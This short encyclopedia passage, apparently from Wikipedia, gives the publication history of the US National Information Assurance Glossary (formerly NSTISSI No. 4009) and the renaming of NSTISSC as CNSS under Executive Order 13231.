The glossary was previously published as the National Information Systems Security Glossary (NSTISSI No. 4009) by the National Security Telecommunications and Information Systems Security Committee (NSTISSC). Under Executive Order (E.O.) 13231 of October 16, 2001, Critical Infrastructure Protection in the Information Age, President George W. Bush redesignated the NSTISSC as the Committee on National Security Systems (CNSS). The most recent version was revised April 26, 2010.[1]
https://en.wikipedia.org/wiki/National_Information_Assurance_Glossary